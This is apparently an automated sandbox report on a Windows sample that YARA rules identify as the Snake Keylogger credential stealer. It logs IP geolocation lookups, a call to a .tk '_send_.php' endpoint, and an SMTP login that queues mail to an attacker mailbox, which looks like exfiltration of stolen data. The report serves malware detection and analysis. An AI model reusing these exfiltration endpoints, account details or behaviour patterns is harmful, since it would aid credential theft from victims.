Apr 8, 2024 10:03:08.475114107 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:08 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e8e72126ee3c44bd1c7f3fa8d43ebb0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:02:59 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 08:02:59 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:02:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65280 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Jr12qL%2Fz3YGWSuzorSDg2Kq%2BBGO5tfztFDLj26qf4EZxzXRixV7A%2BD%2Fui6ET2GBR5EelpVX5sq3Z3Q1GuNp8J8%2Bvq8DsCLce4vCoxxFBiMv84kdCwrD6rOPwwbnP20zbPIglfDG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bcffefe89abd-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:02:59 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:02:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:02:59 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 08:03:00 UTC	702	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65281 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwydnQ2T5D37KxLjRbFk64Xp%2Bi1V1KgoUQAofghFCin707ujYRO3gp6XOmkXVf2U8MkHWNcTka7RysbwMPKX3gzPEOdvl6zVSEEOh7T70Y8DN1Ob67nhGUWJGWx4IDu7bbD8Abaa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd050c1f12a7-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:00 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:00 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 08:03:01 UTC	708	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65282 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b0JhGYKnYKC3adAoMBYl5esS7AC43Bx2EsIcZP%2F4h6xX9CFun4D8SAS2qSjgpzEVhkWpLLpt7qaMPxhfCYjL03J%2Fu4teyMn%2FT0P0v9s2P4Lnu2oir%2FNIf7hYpQ7yKAnSebyZeTKA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd0b8ad6a51b-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:01 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:01 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 08:03:02 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65283 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P7xH5so9MvwKBeZ7omAd5Gff%2ByHPkUSJa%2FUFKdJt0RLvpRdhQ2u%2FcqlV%2Bu1mPGYbrJE5YQGzSaRDR%2BjRZB513uewNTZsyjGo8Jk5%2BvAOlpzpfnfFZh72PEpqJliVFadxCpGuW8fG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd121ab57471-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:02 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:02 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 08:03:03 UTC	708	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65284 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9e69OuAAWs3hzXocQhHhDSRkfEhibu%2BtjGCRtn5trrwCLqSNDWmdNj1T8YI6Hl2CPigjluuLe%2Fd7AP1IBPFgbKwUFY3A3nqI1zCceWygDL50hpnD4EUpDTFpaNym5W2Wco8ZO3%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd189b2c9add-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:03 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:04 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 08:03:05 UTC	702	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:05 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65286 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VLTWaQCmGKgGlb0VH5n7GQi66DDmFFxe0wYIAS4Lz8ZRl4YR9fShSX4CRoAmaxf4heTP5QQgNaRsuD7YSVFEe5BaxcciUnpYGAOazTT0YEfNwU7v7HBUz3JMDhGmaYOZ42ek2G%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd2569af8756-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:05 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:07 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 08:03:07 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65288 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxHGXkGou5u6PulcD0Jl%2FbTuJhCHPUXSe0v3Fj8vvS4o9Gp8FjdI9tyt%2Bh2XEAN9kUbAc7Fe9%2BWC9K8YXBo%2FNI0866XbS3fKgeoJei7CnzANZda2wI%2FE5oh7zF%2Fv65IAePcG5wh8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd3499c78750-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:07 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49719	104.21.67.152	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:08 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 08:03:09 UTC	708	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 65289 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbOEe78NdfRyCnvSz6cXpvseW0PmHWLYUpQerdGYwAZ%2FepnljiwHqYomMoTeWHzKSAmqfCx0AhneGukVZMmvkaUSoRNspsYZu%2BEczWgIRYLULw%2Fe8n2G6A2LSaWSH4%2BWqUISezv0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8710bd3cff3d4c1a-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:09 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 08:03:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	104.21.27.85	443	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 08:03:09 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-08 08:03:40 UTC	739	IN	HTTP/1.1 522 Date: Mon, 08 Apr 2024 08:03:40 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOn3KALFHUXeTf%2Bh8PolcgCiew0eOdW7SU6GeBQuXcXnucdhiGDrygvp0uB7t5rU3CVv%2BuncldQL2By8XB5jJ8XJvPBqW%2BRrfvJeQg2PKAE%2BJwlvVV4TVjyL41mPMQUk%2BiEH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8710bd430b9cb3e3-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 08:03:40 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 8, 2024 10:03:47.095187902 CEST	587	49728	208.91.199.225	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 8, 2024 10:03:47.361692905 CEST	49728	587	192.168.2.5	208.91.199.225	EHLO 138727
Apr 8, 2024 10:03:47.558579922 CEST	587	49728	208.91.199.225	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Apr 8, 2024 10:03:47.562429905 CEST	49728	587	192.168.2.5	208.91.199.225	AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
Apr 8, 2024 10:03:47.762252092 CEST	587	49728	208.91.199.225	192.168.2.5	334 UGFzc3dvcmQ6
Apr 8, 2024 10:03:49.157191992 CEST	587	49728	208.91.199.225	192.168.2.5	235 2.7.0 Authentication successful
Apr 8, 2024 10:03:49.157516956 CEST	49728	587	192.168.2.5	208.91.199.225	MAIL FROM:<tslogs@mksiimst.com>
Apr 8, 2024 10:03:49.358012915 CEST	587	49728	208.91.199.225	192.168.2.5	250 2.1.0 Ok
Apr 8, 2024 10:03:49.358366966 CEST	49728	587	192.168.2.5	208.91.199.225	RCPT TO:<tslogs@mksiimst.com>
Apr 8, 2024 10:03:49.573837042 CEST	587	49728	208.91.199.225	192.168.2.5	250 2.1.5 Ok
Apr 8, 2024 10:03:49.574067116 CEST	49728	587	192.168.2.5	208.91.199.225	DATA
Apr 8, 2024 10:03:49.772804976 CEST	587	49728	208.91.199.225	192.168.2.5	354 End data with <CR><LF>.<CR><LF>
Apr 8, 2024 10:03:49.773704052 CEST	49728	587	192.168.2.5	208.91.199.225	.
Apr 8, 2024 10:03:50.093750000 CEST	587	49728	208.91.199.225	192.168.2.5	250 2.0.0 Ok: queued as 7383D640698
Apr 8, 2024 10:05:26.598421097 CEST	49728	587	192.168.2.5	208.91.199.225	QUIT
Apr 8, 2024 10:05:26.796036005 CEST	587	49728	208.91.199.225	192.168.2.5	221 2.0.0 Bye

Target ID:	0
Start time:	10:02:56
Start date:	08/04/2024
Path:	C:\Users\user\Desktop\Zarefy4bOs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Zarefy4bOs.exe"
Imagebase:	0x420000
File size:	133'120 bytes
MD5 hash:	EB9D9BC525BF2CFD5A566FF1939A65D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	65.8%
Total number of Nodes:	38
Total number of Limit Nodes:	4

Executed Functions

Function 026621A8 Relevance: 8.2, Strings: 6, Instructions: 692
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 026622A0
Xaq, xrefs: 026634B6
Xaq, xrefs: 0266231F
Xaq, xrefs: 0266348D
Xaq, xrefs: 0266236C
Xaq, xrefs: 02662266

Memory Dump Source

